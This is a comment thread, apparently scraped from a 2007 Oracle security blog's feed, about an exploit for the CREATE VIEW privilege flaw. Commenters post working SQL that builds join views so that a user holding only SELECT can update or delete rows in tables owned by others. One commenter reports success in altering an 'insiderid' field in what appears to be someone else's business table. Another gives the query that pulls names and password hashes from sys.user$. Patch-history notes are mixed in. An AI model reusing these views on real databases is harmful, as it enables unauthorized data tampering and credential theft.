Kommentare zu: Exploit for Create View Problem published http://blog.red-database-security.com/2007/07/22/exploit-for-create-view-problem-published/ Oracle Security Wed, 16 May 2012 23:47:52 +0000 http://wordpress.org/?v=2.2.1 Von: seydon http://blog.red-database-security.com/2007/07/22/exploit-for-create-view-problem-published/#comment-87 seydon Mon, 30 Jul 2007 09:44:39 +0000 http://blog.red-database-security.com/2007/07/22/exploit-for-create-view-problem-published/#comment-87 Thanks. It's work!!! With "left join" - dont't work. With "...WHERE ID IN..." work perfect. Version - 9.2.0.8. Thanks.
It’s work!!!
With “left join” - dont’t work.
With “…WHERE ID IN…” work perfect.
Version - 9.2.0.8.

]]> Von: Alexander Kornbrust http://blog.red-database-security.com/2007/07/22/exploit-for-create-view-problem-published/#comment-68 Alexander Kornbrust Fri, 27 Jul 2007 14:37:42 +0000 http://blog.red-database-security.com/2007/07/22/exploit-for-create-view-problem-published/#comment-68 Seydon, I don't see the problem. You need only SELECT and CREATE VIEW privileges. What database version do you have? You could try the following view instead: create or replace hackcontra as <specially crafted view> This was one of our testcases: --------------------------- create view hackdual as select * from dual </specially><specially crafted view> delete from hackdual; rollback;</specially> Seydon,

I don’t see the problem. You need only SELECT and CREATE VIEW privileges.
What database version do you have? You could try the following view instead:

create or replace hackcontra as

This was one of our testcases:
—————————
create view hackdual as
select * from dual

delete from hackdual;

rollback;

]]> Von: seydon http://blog.red-database-security.com/2007/07/22/exploit-for-create-view-problem-published/#comment-65 seydon Fri, 27 Jul 2007 06:09:00 +0000 http://blog.red-database-security.com/2007/07/22/exploit-for-create-view-problem-published/#comment-65 Hi. Tried this. dont work. USERS PRIVILEGE: CREATE SESSION CREATE VIEW. Have right for select on table Contragent. Write script: create or replace view test_hack_view as select x.id, x.insiderid from cret.contragent x left outer join cret.contragent y on x.id=y.id; update test_hack_view set insiderid='1' where id='12345'; GO/ and receive error: ORA-01031: insufficient privileges. Whats right I must have for this exploit? Hi.

Tried this.
dont work.

USERS PRIVILEGE:
CREATE SESSION
CREATE VIEW.

Have right for select on table Contragent.
Write script:
create or replace view test_hack_view as select x.id, x.insiderid from cret.contragent x left outer join cret.contragent y on x.id=y.id;
update test_hack_view set insiderid=’1′ where id=’12345′;

GO/

and receive error:
ORA-01031: insufficient privileges.

Whats right I must have for this exploit?

]]> Von: bunker http://blog.red-database-security.com/2007/07/22/exploit-for-create-view-problem-published/#comment-58 bunker Wed, 25 Jul 2007 14:30:27 +0000 http://blog.red-database-security.com/2007/07/22/exploit-for-create-view-problem-published/#comment-58 You need the "select" privilege on sys.user$. Otherwise you can try to create a similar view on another table, where you can do select, and make update, insert or delete on it! Bye, bunker You need the “select” privilege on sys.user$.

Otherwise you can try to create a similar view on another table, where you can do select, and make update, insert or delete on it!

Bye,

bunker

]]> Von: Andre van Winssen http://blog.red-database-security.com/2007/07/22/exploit-for-create-view-problem-published/#comment-55 Andre van Winssen Wed, 25 Jul 2007 09:32:54 +0000 http://blog.red-database-security.com/2007/07/22/exploit-for-create-view-problem-published/#comment-55 Alex, I tried the bunkerview on a 10203 database which had patch 7 (6038241) applied which is also labeled as cpu APRIL 2007 and it failed. So looks like it was already fixed before Cpu July 2007 came out. I have the feeling that Oracle releases security fixes in between cpu's as well. Below's the patch history on windows 32 it platform for 10.2.0.3 since cpu april 2007: 6116131 PATCH 8 WINDOWS 32 BIT 10.2.0.3 17-JUL-2007 (First Cpu July 2007) 6038241 PATCH 7 WINDOWS 32 BIT 10.2.0.3 05-JUL-2007 6012742 PATCH 6 WINDOWS 32 BIT 10.2.0.3 07-JUN-2007 5946186 PATCH 5 WINDOWS 32 BIT 10.2.0.3 19-MAY-2007 5948242 PATCH 4 WINDOWS 32 BIT 10.2.0.3 17-APR-2007 (First Cpu April 2007) SQL> show user USER is "HEK" SQL> select * from user_sys_privs; USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- HEK CREATE SESSION NO HEK CREATE VIEW NO SQL> get bunkerview2 1 create or replace view bunkerview as 2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on 3* x.name=y.name SQL> / select x.name,x.password from sys.user$ x left outer join sys.user$ y on * ERROR at line 2: ORA-00942: table or view does not exist Alex,
I tried the bunkerview on a 10203 database which had patch 7 (6038241) applied which is also labeled as cpu APRIL 2007 and it failed. So looks like it was already fixed before Cpu July 2007 came out. I have the feeling that Oracle releases security fixes in between cpu’s as well.

Below’s the patch history on windows 32 it platform for 10.2.0.3 since cpu april 2007:

6116131 PATCH 8 WINDOWS 32 BIT 10.2.0.3 17-JUL-2007 (First Cpu July 2007)
6038241 PATCH 7 WINDOWS 32 BIT 10.2.0.3 05-JUL-2007
6012742 PATCH 6 WINDOWS 32 BIT 10.2.0.3 07-JUN-2007
5946186 PATCH 5 WINDOWS 32 BIT 10.2.0.3 19-MAY-2007
5948242 PATCH 4 WINDOWS 32 BIT 10.2.0.3 17-APR-2007 (First Cpu April 2007)

SQL> show user
USER is “HEK”
SQL> select * from user_sys_privs;

USERNAME PRIVILEGE ADM
—————————— —————————————- —
HEK CREATE SESSION NO
HEK CREATE VIEW NO

SQL> get bunkerview2
1 create or replace view bunkerview as
2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
3* x.name=y.name
SQL> /
select x.name,x.password from sys.user$ x left outer join sys.user$ y on
*
ERROR at line 2:
ORA-00942: table or view does not exist

]]>